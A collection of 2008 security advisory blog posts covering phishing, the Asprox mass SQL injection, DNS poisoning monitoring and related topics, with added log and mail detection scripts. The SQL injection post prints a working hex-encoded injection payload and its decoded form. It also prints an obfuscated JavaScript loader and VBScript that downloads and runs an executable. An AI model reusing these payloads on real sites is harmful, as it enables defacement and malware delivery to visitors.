  • Know your computer: how much hard disk space is available, whether it is running slow, whether there are unexpected pop-ups.  If anything seems out of the ordinary, slow down and take a close look.  Your computer may be trying to tell you something.  It may be warning you that something has gone amiss.  Run a virus scan, run a spyware scan, look at the Event Viewer logs.  Check the space on your hard drive.  Is it using a lot more now than you expect?  If it is, you may have a backdoor on your computer and someone may be storing information on it that could be dangerous and costly.

  • Don’t download P2P programs.  Music/video downloads from services like Limewire, Bearshare, Gnutella and Kazaa can open your computer up to massive exploits.  These services claim to let you download for free what you would have to pay for at Napster, iTunes, Netflix or any of the other legitimate download sites.  Why would you want to pay for something when you can get it for free, right?

Well, as my momma used to say…  no such thing as somethin’ for nothin’.  Somewhere down the line you are going to have to pay.  These “free” download sites carry a large payload.  That payload is an open door right into your computer’s hard drive and the network it is connected to.  This payload may include keyloggers or other nasty little parasites that can strip you of your personal identity.  My recommendation is: don’t use P2P programs.  Download your entertainment from legitimate sites.

These are just a few of the tips that I have to offer.  Now let’s hear from our readers.  As I said, I don’t have all the answers and am open to input from our friends on the net.

Additional Resources

http://www.cert.org/homeusers/HomeComputerSecurity/

http://www.microsoft.com/protect/default.mspx

http://www.cert.org/tech_tips/home_networks.html

1 Comments

Published: 2008-08-09

Cleveland Outage

It appears that there is an outage in the Cleveland area.  Handler Steve and I have been looking at some problems that he has been having getting to various websites from where he is.  We discovered that according to the Internet Health Report the Cleveland area is NA.  I have not been able to find any information online about the possible cause.  If any of you have information about the outage, drop us an email and let us know what is going on.  We will let you know as soon as we hear something.

www.internetpulse.net/

Update:

Well, the Internet Health Report is still showing Cleveland red across the board for SBC, but ISC reader Jack and I have been playing dodge the grey blocks with the AT&T online system to see if there is a problem, or not.

http://ipnetwork.bgtmo.ip.att.net/pws/network_delay.html

Steve Hall

0 Comments

Published: 2008-08-08

More SQL Injections - very active right now

Scott, one of our readers, wrote in to let us know that attempts were being made on his servers through an SQL injection.  He was the first and assisted with the analysis, but he was not the last.  Since the first report we have received several more in the last 4 hours or so.  There seems to be a lot of activity with this particular attack.

It looks like a repeat/variant on the attacks mentioned by Bojan here.

Overview:

w.js --- new.htm ---|--- Flash.htm ---|--- i1.html ---|--- i/f16.swf
                    |                 |               |--- i/f28.swf
                    |                 |--- f2.html ---|--- i/f64.swf
                    |                                 |--- i/f115.swf
                    |                                 |--- i/f45.swf
                    |                                 |--- i/f47.swf
                    |--- 06014.htm
                    |--- yahoo.htm ---|
                    |--- office.htm --|--- rondll32.exe --- msyahoo.exe --- wsv.exe/thunder.exe
                    |--- ksx.htm -----|

The Injection:
The string being injected is

“DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726
368617228323535292C40432076617263686172283430303029204445434C415245205461626
C655F437572736------------snip ------------2204445414C4C4F43436F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)" :”

Which breaks down into:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo. 
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo.  1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM  Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

Various types of sites seem to be hit at the moment.  From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
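As an added example (not from the diary or the reporters' analysis), here is a Python checker for web-server access logs that URL-decodes the request, pulls the hex blob out of the CAST(0x... AS CHAR(n)) wrapper, decodes it and flags the cursor/UPDATE signature shown above; it also extracts the injected script URL so it can be blocked.  The log lines and the hex payload are constructed for this example, with example.invalid standing in for the script host.

```python
import re
from urllib.parse import unquote

# CAST(0x<hex> AS CHAR(4000)) as it reads after URL-decoding; the optional N prefix
# also catches NCHAR/NVARCHAR variants, whose payload is UTF-16LE.
CAST_HEX_RE = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\s*\(\d+\)\s*\)", re.IGNORECASE)

# Request field of a combined-format log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')

# Fragments of the decoded statement that, together, identify the cursor-driven mass UPDATE.
MARKERS = ("DECLARE TABLE_CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "<SCRIPT SRC=")

SCRIPT_SRC_RE = re.compile(r'<script\s+src=["\']?([^"\'>\s]+)', re.IGNORECASE)


def decode_cast_payloads(request_target):
    """Return the decoded text of every CAST(0x... AS [N]CHAR(n)) in a request target."""
    decoded = unquote(request_target)       # %20 -> space; '+' is literal in a path
    payloads = []
    for m in CAST_HEX_RE.finditer(decoded):
        try:
            raw = bytes.fromhex(m.group(1))
        except ValueError:                  # truncated / odd-length hex in the log
            continue
        if m.group(2).upper() == "N":       # NCHAR/NVARCHAR: UTF-16LE text
            payloads.append(raw.decode("utf-16-le", "replace"))
        else:                               # CHAR/VARCHAR: single-byte text
            payloads.append(raw.decode("latin-1"))
    return payloads


def analyse_log_line(line):
    """Return None for a line without a CAST/hex payload; otherwise a verdict dict with
    the decoded payload(s), the markers found and any injected script URLs."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    payloads = decode_cast_payloads(m.group(1))
    if not payloads:
        return None
    joined = "\n".join(payloads)
    markers = [mk for mk in MARKERS if mk in joined.upper()]
    return {
        "payloads": payloads,
        "markers": markers,
        "script_urls": SCRIPT_SRC_RE.findall(joined),
        "malicious": len(markers) >= 2,
    }


# --- constructed sample data (a shortened, non-functional stand-in, not the real payload) ---
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "... exec('update ['+@T+'] set ['+@C+']=['+@C+']+''\"></title>"
    "<script src=\"http://example.invalid/w.js\"></script><!--'' ...') ..."
)
SAMPLE_HEX = SAMPLE_SQL.encode("latin-1").hex().upper()
SAMPLE_LOG = (
    '203.0.113.5 - - [08/Aug/2008:10:15:02 +0000] "GET /page.asp?id=1;DECLARE%20@S%20CHAR(4000);'
    "SET%20@S=CAST(0x" + SAMPLE_HEX + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0"'
)
CLEAN_LOG = '203.0.113.9 - - [08/Aug/2008:10:15:03 +0000] "GET /page.asp?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"'

if __name__ == "__main__":
    for entry in (CLEAN_LOG, SAMPLE_LOG):
        verdict = analyse_log_line(entry)
        print("clean" if verdict is None else verdict)
```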

Next:

A user visiting the site will hit w.js which, if they are using English, will pull down new.htm.  new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages: flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm.  Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html.

i1.html & f2.html

These files contain some JavaScript:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";c=eval("String.fromCharCode("+c+")");document.write("<script>"+c+"<\/script>");
</script>

This expands out to:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}; document.write("")

So depending on the Flash version running and the browser, a different file is tried (the IE version uses i64, etc.).  Detection for these is poor.  For the IE versions 9/36 at VT detect the file as malicious, and for FF 10/36 detect the file as malicious.

yahoo.htm

The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute.

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\\msyahoo.exe"
</script>

Office.htm

Attempts to create ActiveX objects and pulls the same rondll32.exe.  It looks like rondll32.exe pulls down thunder.exe and wsv.exe.

ksx.htm

Attempts to get the browser to include the rondll32.exe file.

Detection for rondll32.exe is good with most AV products catching this one.

06014.htm

This file was unavailable at the time I checked.

These attacks are happening right now.  The people that reported them identified the attacks in their log files and IDS systems.  It is good to see that people are checking their logs.   Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site.  This round looks like it has just started.  We'll keep an eye on how this develops.

Cheers.

Mark - Shearwater

5 Comments

Published: 2008-08-08

'CNN - My Custom Alert'

Thanks to our readers for letting us know that they are receiving a good amount of some very authentic-looking phishing spam.  Although the email appears to be from CNN again, the origination address is not even obfuscated.  ISC Handler Daniel had written a story about the "CNN - Top Ten" Storm worm a few days ago.

isc.sans.org/diary.html

These sorts of emails have one big thing going for them: the ability to get that user to click.  The CNN brand is trusted and recognized by almost all of our users.  Anyone seeing this email may not think twice about clicking on the link unless we tell them not to.  What a great opportunity for user training.  Send out a short security awareness email to your users and explain to them what is really happening.  Ask them to tell their kids too.

Far too many people are making this a very profitable way for cyber-criminals to make money.  Try to help your end users understand how to spot a fraudulent email address, how to dissect a domain name and find a masked URL.  Just think about all the infections and exploitations you may prevent.

For more information see the Anti-Phishing Working Group website.

http://www.antiphishing.org/

2 Comments

Published: 2008-08-07

Cleanup in aisle 3 please. Asprox lying around

Whilst looking for something completely different I came across our old friend ASPROX.  See the previous diary from Marc.

It seems that a lot of the domains used by this are still or again active, typically using fast flux.  The script that is being injected tends to be ngg.js, fgg.js, b.js or js.js.  This links to an IP address (still up) where a CGI script starts the road of pain.

Doing a quick search using our friend Google I ended up with 1,470,000 sites that are currently infected.  Now about 591,000 or so are b.js, which seems to point to inactive domains, so these are unlikely to do damage.  The rest is a mixture of active and inactive links.

The high number of infected sites points to a couple of issues. 

  1. Sites are compromised and nobody notices
  2. Sites that are infected are not cleaned up.

Now the number of infected sites is high, but the sky is not falling.  However, if you have a spare few minutes, do the following Google search, replacing yoursite with your domain, e.g. sans.org (just cut and paste the whole search).

   site:yoursite    "script src=http://*/""ngg.js"|"js.js"|"b.js"

If the search returns results, you have some cleaning to do.

I did a quick breakdown of infected sites:

.gov     -   238        .com     -  474K
.gov.au  -   927        .org     - 79.9K
.gov.uk  - 2,930        .com.au  - 19.5K
.gov.cn  -   34K        .co.uk   - 19.3K
.gov.za  -   424        .ca      - 13.1K
.gov.br  -   263

I'll let you know next week if things are getting better or worse.

Happy cleaning.

Mark

0 Comments

Published: 2008-08-07

Olympic Clicks

You don’t have to be the oracle at Delphi to be able to predict that the next few weeks are going to be rife with attempts to phish, SPAM and scam with an Olympic theme. 

With the Olympics starting tomorrow our users are going to start receiving themed emails with something extra.  They will start receiving emails similar to the cnn.com top ten emails Daniel wrote about, but also messages from “news services”, Storm with Olympic-themed subjects, messages from Visa as Olympic sponsor, etc.  They will all ask the recipient to click.  So it is probably a good idea to remind your users of the dangers of the almighty click.

Now whilst 15 lashes with the cane for the first person to introduce nasties might sound like a great idea, in most countries this is frowned upon.  Likewise the advice of “don’t click anything” is also likely to be ignored.  So we will have to come up with some ideas that will help prevent people from becoming victims.  Let’s arm them with some rules of clicking safely.

Don’t click any links when:

  • the email was sent by someone you do not know.
  • the email was sent by someone you might know, but whose name and email address do not match, e.g. sender: John Smith <Shjdyu@yahoo.com> or Albert Einstein <stacyB@hotmail.com>.
  • the email asks you to click a link to “verify” personal details, e.g. “please click the link below to verify your account details”.
  • the link looks funny, e.g. http://123.123.123.123/dhjeuaUhskw/special_surprise or www.notquite-the-banks-name.com.
  • the web page says you have
    • “won a laptop, click here to claim”,
    • “a virus/spyware, click here to download a program to fix it”,
    • “been selected as our lucky winner for .....”

If you have passed all of the above tests and you succumb to the urge to click, then before you click ask yourself some additional questions:

  • How certain am I that the email was sent by the sender?
  • Does the link match what I would expect it to be?  e.g.  www.xyzstore.com rather than www.xyzzstore.com
  • When you hover the cursor over the link, where does the browser say it will take you?  e.g. hover your mouse over the following link http://www.xyzstore.com – would this link take you somewhere “special”?

So these are some of the examples I could think of to help educate my users.  If you have some that I can add, please send them in.

As for system admins and security folks, in the next three weeks you might want to make sure that your AV is up to date, your spam engines are working properly, web traffic is filtered and you watch your logs for connections to weird places, keeping in mind that until August 24 some parts of China are not going to be weird places.  You might even consider doing what I have done at a few sites, which is to whitelist the official Olympic sites and block the rest.

Just to get into the spirit of things,  Go Aussie Go! (and Kiwi’s too).  ;-)

Cheers

Mark H - Shearwater

0 Comments

Published: 2008-08-06

When spammers use your own e-mails

Some time ago, one of our readers, Mike S, sent an e-mail with an interesting observation about how spammers used e-mails from one of his customers (this has been actually sitting in my own inbox for way too long).

The e-mails contained all "standard" elements such as spoofed headers etc, but there was a very interesting thing with the body content.

As with most e-mail spammers send, these e-mails were HTML as well. However, the interesting part was that the spammers took his clients' e-mails and modified the HTML a bit to include their own message.

The spammers added the link they wanted to spam at the top and then opened a <TITLE> HTML tag. After the TITLE tag came the full original e-mail, but the tag was never actually closed. This resulted in Outlook displaying only the spammed link, but not showing the original e-mail content.

The raw e-mail looked like this:

--AlternativeBoundary.22222222.22222222
Content-Type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: 8bit

<html><center><FONT SIZE="5" COLOR="#10566D">Spammers message</font><br><br><A HREF="http://spammers link">http://spammers link</A>
<title><body leftmargin=5 topmargin=5 marginwidth=0 marginheight=0>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white align=center border=0>
<tr><td style='{font-family: Verdana, sans-serif; color=#7a929f;font-weight:700;font-size: 11px;text-transform : capitalize;}'>
.... ORIGINAL MAIL CONTENT ...
</td></tr>
</table><p>&nbsp;</p>
</body>


Of course, by using the original e-mail content (which was legitimate when the client sent it), the spammers are trying to evade Bayesian filters, and at least in Mike's example they even managed to get SpamAssassin to decrease the final score of the e-mail.
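As an added example (not from the diary or from Mike's report), a small Python check that parses an HTML mail part and flags the unclosed <TITLE> trick: it counts how much text ends up hidden inside the still-open title versus what stays visible, and lists the links the recipient can actually see.  The two sample parts are constructed for this example, with spammer.invalid and example.invalid as placeholder hosts.

```python
from html.parser import HTMLParser


class TitleSwallowCheck(HTMLParser):
    """Track whether a <title> is opened and never closed, how much text ends up
    inside it (hidden from the reader) and which links stay visible."""

    def __init__(self):
        super().__init__()
        self.title_open = False
        self.hidden_chars = 0      # text seen while a <title> is still open
        self.visible_chars = 0     # text seen outside any <title>
        self.visible_links = []    # hrefs the recipient can actually click

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.title_open = True
        elif tag == "a" and not self.title_open:
            self.visible_links += [v for k, v in attrs if k == "href" and v]

    def handle_endtag(self, tag):
        if tag == "title":
            self.title_open = False

    def handle_data(self, data):
        n = len(data.strip())
        if self.title_open:
            self.hidden_chars += n
        else:
            self.visible_chars += n


def check_html_part(html):
    """Return a verdict dict; 'suspicious' means the part ended with <title> still
    open and more text inside it than outside it, i.e. the body was swallowed."""
    p = TitleSwallowCheck()
    p.feed(html)
    p.close()
    return {
        "unclosed_title": p.title_open,
        "hidden_chars": p.hidden_chars,
        "visible_chars": p.visible_chars,
        "visible_links": p.visible_links,
        "suspicious": p.title_open and p.hidden_chars > p.visible_chars,
    }


# --- constructed sample parts, laid out like the raw message quoted above ---
SPAM_PART = """<html><center><FONT SIZE="5" COLOR="#10566D">Spammers message</font><br><br>
<A HREF="http://spammer.invalid/">http://spammer.invalid/</A>
<title><body leftmargin=5 topmargin=5 marginwidth=0 marginheight=0>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white align=center border=0>
<tr><td>Dear customer, here is the quarterly newsletter you asked us to send. (original mail content, constructed)</td></tr>
</table><p>&nbsp;</p>
</body>"""

CLEAN_PART = """<html><head><title>Quarterly newsletter</title></head>
<body><p>Dear customer, here is the quarterly newsletter you asked us to send.</p>
<p><a href="https://example.invalid/news">Read it online</a></p></body></html>"""

if __name__ == "__main__":
    for name, part in (("spam", SPAM_PART), ("clean", CLEAN_PART)):
        print(name, check_html_part(part))
```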

In any case, it's an arms race between spammers and content filter developers. Thanks Mike again for sending this interesting information (and sorry it took so long to analyze it).

--
Bojan

0 Comments

Published: 2008-08-05

Watching those DNS logs

Among the frantic activity to get all the DNS resolvers patched, very little has been said about how to be on the lookout for DNS poisoning attempts. Irrespective of the attack details, the two possible scenarios seem to be
(1) someone attacks a DNS resolver/forwarder of yours
(2) someone attacks a remote resolver/forwarder to poison a domain you own
The impact of the first scenario would be to draw your own users from, say, google.com to an evil incarnation instead. The impact of the second scenario would be that a customer of yours somewhere else in the world can no longer get to your services and is being redirected to or through an evil third party. The first scenario is what you patched your resolvers against; for the second scenario, you have to hope that all your customers are patched. If you are, for example, a retail bank with a nationwide online presence, chances are that not all your clients (or rather their ISPs) are patched and safe.

From the attack details that have so far been disclosed, scenario (2) involves a high number of queries for bogus names in the domain that you own. Your authoritative DNS server will respond with "NXDOMAIN" (no such domain) to all these requests, but every such query provides the attacker with a chance to inject a bogus reply to poison the querying resolver of your client's ISP.

Emergingthreats.net has a Snort rule (sid:2008470) to catch an excessive number of NXDOMAIN replies received by your resolver. This covers scenario (1). Scenario (2) would require a way to watch for a high number of NXDOMAIN answers sent by your own authoritative DNS server. A quick check we made showed that neither BIND9 nor MS-DNS seems to offer any easy way to log NXDOMAIN answers of your DNS server without going into debug-dump-it-all mode. The statistics collected by BIND keep track of sent NXDOMAIN records in the "SNXD" counter, but that's about it.

If you have any good suggestions on how to watch for a high number of queries for non-existent hosts in your domain, or for a high number of NXDOMAIN replies leaving your DNS server, please let us know.
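As an added example (not from the diary), here is a Python sketch of one way to watch for scenario (2) from the authoritative side: it reads BIND query-log lines, keeps only names inside a zone you own that are absent from your zone data (so they would be answered NXDOMAIN), and reports any resolver that asks for an unusual number of distinct such names within one window.  The query-log line format is assumed, the zone example.com, the host list and the log lines are constructed, and the threshold is a tuning value.

```python
from collections import defaultdict
import re

# BIND querylog line as logged by an authoritative server (format assumed here):
#   client 203.0.113.20#40012: query: a00012xyz.example.com IN A +
QUERY_RE = re.compile(r"client (\d+\.\d+\.\d+\.\d+)#\d+: query: (\S+) IN (\S+)")


def bogus_name_bursts(lines, zone, known_names, threshold):
    """Count, per querying resolver, the distinct names inside `zone` that are not in
    `known_names` (i.e. names your server answers with NXDOMAIN).  Return
    {resolver: count} for every resolver at or above `threshold`.  Feed it the
    lines of one time window (a minute, say) so the count is a rate."""
    zone = zone.lower().rstrip(".")
    known = {n.lower().rstrip(".") for n in known_names}
    unknown = defaultdict(set)
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue                                   # not a query-log line
        src, qname = m.group(1), m.group(2).lower().rstrip(".")
        if qname == zone or not qname.endswith("." + zone):
            continue                                   # the apex, or some other zone
        if qname in known:
            continue                                   # legitimate host in our zone
        unknown[src].add(qname)
    return {src: len(names) for src, names in unknown.items() if len(names) >= threshold}


# --- constructed sample data ---
KNOWN_NAMES = {"www.example.com", "mail.example.com", "ns1.example.com"}
SAMPLE_LOG = [
    "client 198.51.100.7#53281: query: www.example.com IN A +",
    "client 198.51.100.7#53282: query: mail.example.com IN MX +",
    "client 198.51.100.7#53283: query: wwww.example.com IN A +",   # a single typo: harmless
    "client 203.0.113.20#40001: query: random.other.test IN A +",  # not our zone: ignored
]
# One resolver asking for 30 distinct random-looking labels under our zone.
SAMPLE_LOG += [f"client 203.0.113.20#{40100 + i}: query: a{i:05d}xyz.example.com IN A +"
               for i in range(30)]

if __name__ == "__main__":
    print(bogus_name_bursts(SAMPLE_LOG, "example.com", KNOWN_NAMES, threshold=20))
    # -> {'203.0.113.20': 30}
```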
 

2 Comments

Published: 2008-08-05

The news update you never asked for

If you missed last week's chance to get your "airplane ticket", you currently have a second opportunity. Emails are making the rounds that claim to come from CNN, and carry a subject of "CNN.com Daily Top 10". Well, they are neither. But the emails contain click-friendly headlines with enticing subjects like "Will all Americans be obese by 2030?" Now who wouldn't want to read THAT?!

Clicking takes you to the netherworld, of course. You currently receive a file called "get_flash_update.exe" (yeah, sure!). Detection for the sample is coming on line, see http://www.virustotal.com/analisis/258fbdfb7eb6ecfedbf236533b03c945

The domain "idoo .com" seems to be up to no good. Other involved domains are too numerous to list, but about 50 of them currently resolve to 200.46.83.233.  That's in Panama.

3 Comments

Published: 2008-08-04

isc.sans.org vs. isc.org

Over the last weeks, with all the attention focused on DNS, we have seen a couple of news articles mistaking us (Internet Storm Center) for isc.org (Internet Systems Consortium). Sadly, yet another reminder of how carelessly some of these articles are researched.

On the plus side: I don't remember seeing a single reader request for BIND patches ;-). I guess our readers are a bit smarter.

A number of security and IT/networking related organizations use the acronym "ISC". For example ISC^2, the company behind the CISSP certification. There is also an ISC conference dealing with physical security and an "Information Security Committee" of the American Bar Association. Neither organization has any affiliation with us or, as far as I can tell, isc.org.

If there is a possibility to confuse us with other ISCs, I typically try to use "SANS ISC" to clarify.

Just as a sidenote: Our first choice for a name was actually "Internet Storm Watch". At the time a company called Okena (now acquired by Cisco) sold an intrusion detection product called "Storm Watch". They asked us not to use the name "Internet Storm Watch". Luckily this happened before we used that name much and it was easy to change.

So for your BIND patches (and a lot of other good stuff), continue to go to www.isc.org.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-03

Securing A Network - Lessons Learned

A few months ago I took over the Abuse Department for a small ISP in the Midwest.  Little did I realize when they asked me to take the abuse that it was really me that was going to be abused.  From disgruntled customers to disgruntled service providers, I have dealt with them all.  Prior to taking on this responsibility I wondered why it was that there was so much spam, why ISPs aren’t taking control of the situation, why it can’t be stopped; after all, how hard could it be?  I now understand, I totally get it.  For those who have never had to deal with the cleanup, have never had to deal with the customers who don’t understand the correlation between spam, viruses, and P2P programs, let me tell you it hasn’t been easy.  In this diary I am going to outline some of the lessons that I have learned and hope that some of you will share your lessons learned with us.

Lesson 1 – Your logs and Log reports can be your most valuable tool and can give you an advanced warning of mail server abuse.  We have a lot of servers and many of them are email servers.  I monitor the log files daily to look for any obvious problems.  I have been amazed at how many times I have detected a problem simply by looking at the logs.  We currently are using Logwatch Reporting.  The summarization in these reports is pretty good.  However, having to look at a report for each server does take a bit of time.  I am reviewing different Log Management programs right now looking for a way to simplify or consolidate the information. I have decided that this may well be my first line of defense.

Lesson 2 – Customer computers without anti-virus and/or firewall protection are a big target, not just for them but for their ISP as well.  It absolutely amazed me how quickly a computer can go from compromised to abused and used.  Over the July 4th weekend while reviewing my logs I noticed that one of our IP addresses, a residential customer’s home computer, was sending over 200,000 emails a day.  I quickly blocked the IP and determined who the customer was.  In my conversation with the customer I asked them if they had an anti-virus program.  They said that they did; when I asked them how long ago they had purchased the license, they couldn’t remember.  It came with their computer and they bought their computer a few years ago.  They said that they updated it every day.  I explained to them that it has to be renewed every year.  They had no idea.  It amazes me that people have no idea what it takes to protect their computer and perhaps their identity as well.

Lesson 3 – A mail server, no matter how well protected, is in danger of being blocklisted.  And once blocklisted it is really hard to get it off the list.  As I indicated, our customer over the 4th of July weekend with a compromised computer was sending massive amounts of spam.  As soon as I discovered it I stopped the activity; however, it was already too late.  The server had been blocklisted.  I attempted to contact the blocklists but found it literally impossible to do.  It took the best part of 3 days to get everything returned to normal.  In the meantime, I had to deal with customers who were trying to send emails and were unable to do so.  They were angry and didn't understand that it is virtually out of my hands.  Once the blocklist is there, you are at the mercy of the listers.  I really wish that there was a process or a better way to resolve these issues.

Lesson 4 – Many of our customers whose IP addresses have been identified with spamming have had 2 things in common.  They either had outdated anti-virus programs (or were using free anti-virus programs) and/or they were using programs to download music/movies from the Internet.  Many of the customers that had the music/movie programs had no idea that these programs were installed on the computer.  (They had teenage computer users.)  The ones that knew the programs were there had no idea about the security risks that these programs created for their computer.  It amazes me how little people know about the programs or files installed on their computers.  They download that cute screen-saver or wallpaper program, not realizing that they have just installed spyware or smutware, thus opening up their computer to the world of the bad guys.

Lesson 5 – We have had a few instances where our small business customers had put up web servers or email servers.  They either had been given bad advice or they used out-of-the-box solutions, and their web servers/mail servers had been compromised.  In one case they had been hosting a PayPal phishing site.  When I contacted them, they did not even know that they had a web server running.  Upon investigation they discovered that not only was the web server service running (and not being used), but user accounts had been added to their server.  The bad guys were doing a bit more than hosting a PayPal site.

At SANSFIRE this year, one of the SANS@Night events was a panel discussion – Meet the Handlers.  A question came up about the education of the small business/home computer user and whose responsibility it was.  One of the guests in the audience didn't feel that it should be an IT responsibility.  I said then and I will say it again: it is our responsibility and it is to our benefit.  If we help to educate the end user, and help them to understand the impact they have on the rest of the customers served by their company, their ISP and the Internet, the ultimate outcome will be a better, cleaner Internet for everyone.  A little education may result in increased understanding of the importance of firewalls, anti-virus/anti-spyware programs and OS updates, which will lead to increased use of these programs.  The increased use of these programs will inevitably lead to fewer compromised computers, fewer botnets, and fewer security holes.

Who better to reach out to our communities, to our families and friends, than those of us who know and understand?  A little education may go a long way.

Let us know what you think.  What lessons have you learned?


Published: 2008-08-02

Issues affecting sites using Sitemeter [resolved]

We received several reports (thanks Thanos and Jim) of sites which use the Sitemeter visitor counter that were no longer loading as of last night for users with Internet Explorer 7.

It appears that during a development update of SiteMeter, their team did not take into account a known bug in this version of the browser, which does not allow modification of a parent container by a script running in one of its children (using either the innerHTML or appendChild method) before the parent has finished loading. This causes the browser to stop loading the site, returning an "Operation aborted" message.

SiteMeter has now resolved the issue and published a blog entry explaining what happened. Just as with advertisement providers and the republishing of RSS feeds, it's an interesting example of how dependent our sites have become on third-party code, and of the potential impact when that code breaks.


Published: 2008-08-02

BIND: -P2 patches are released

As expected, the Internet Systems Consortium today released the -P2 patches, addressing the stability and performance issues that some administrators with significant load on their systems were struggling with after the previous round of DNS patches.

Happy patching!

--
Swa Frantzen -- Section 66


Published: 2008-08-02

A little of that human touch

Several times each week, the Internet Storm Center is requested to broker between parties who have found vulnerabilities, and the corresponding vendors of the software or services affected. While we're always happy to assist, the reason for our involvement has much less to do with animosity between both parties than with the availability of either one of them.

Many accidental finders of a security problem run into trouble when trying to report it to the vendor of the software or service. The last thing someone reporting an issue wishes to do is to spend twenty minutes logging a support case, only to be halted when they are asked for a serial number. There are situations in which someone who is not a direct customer may have become aware of a security issue in your product. Even in that case, you *really* want to know.

If you're a software vendor or services company, please take some time today to ensure you have security contacts listed on your public portals. It's always a good idea to ensure these details are known to organizations such as CERT, oCERT and the Storm Center, and to public resources such as the open vendor database at OSVDB. Nothing beats making them clearly visible on your own site, where it's trivial for everyone to find them.

Cheers,
Maarten


Published: 2008-08-01

Microsoft Malicious Software Removal Tool users: double-check that it's running

A reader (thanks Joe D.) shared with us his recent experience with the Microsoft Windows Malicious Software Removal Tool after the latest update (July).

The tool requires administrative privileges during the initial installation, but once the license agreement has been accepted it can run as an unprivileged user from then on.

From the release notes:
"You must accept the Microsoft Software License Terms. The license terms are only displayed for the first time that you access Automatic Updates.

Note After you accept the one-time license terms, you can receive future versions of the Malicious Software Removal Tool without being logged on to the computer as an administrator."

It appears that some component of the agreement may have changed in this latest update, which requires an administrative user to launch the tool and accept the new agreement. Some users may not be aware of this and be under the false impression that the tool is running on a schedule as expected.

So now would be a good time to double-check that the Malicious Software Removal Tool is in fact running on your machine(s) as expected. In fact, now is a good time to review any security software in general that is expected/required to be running on your systems, to determine that it is in fact running. Any number of updates, misconfigurations, network huffage, or (better/worse) malicious action could have disabled various programs or prevented them from running.

Many flavors of malware will search for and shut down or disable most of the common personal firewall and anti-virus/anti-spyware tools. Even more difficult to audit are those malicious programs which simply modify the firewall settings to open the ports they need.

Here is the link to details on the tool:

http://support.microsoft.com/?kbid=890830

This KB has some useful information for determining the tool is running (especially in a large environment):

http://support.microsoft.com/kb/891716/

Excerpt:
"A2. You can examine the value data for the following registry entry to verify the execution of the tool. You can implement such an examination as part of a startup script or a logon script. This process prevents the tool from running multiple times.

Subkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT
Entry name: Version

Every time that the tool is run, the tool records a GUID in the registry to indicate that it has been executed. This occurs regardless of the results of the execution."

So for the latest update the GUID is:

July 2008    BC308029-4E38-4D89-85C0-8A04FC9AD976

This may also help determine that the tool is being updated.
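One way to implement the check that KB891716 describes, as an added example for this diary (not Microsoft's code, and assuming PowerShell is available on the client), using the registry entry named in the KB and the July 2008 GUID quoted above:

```powershell
# Added example (not from the diary or from Microsoft): verify from a logon or
# startup script that the Malicious Software Removal Tool has actually run, and
# that the run recorded in the registry was the current release.
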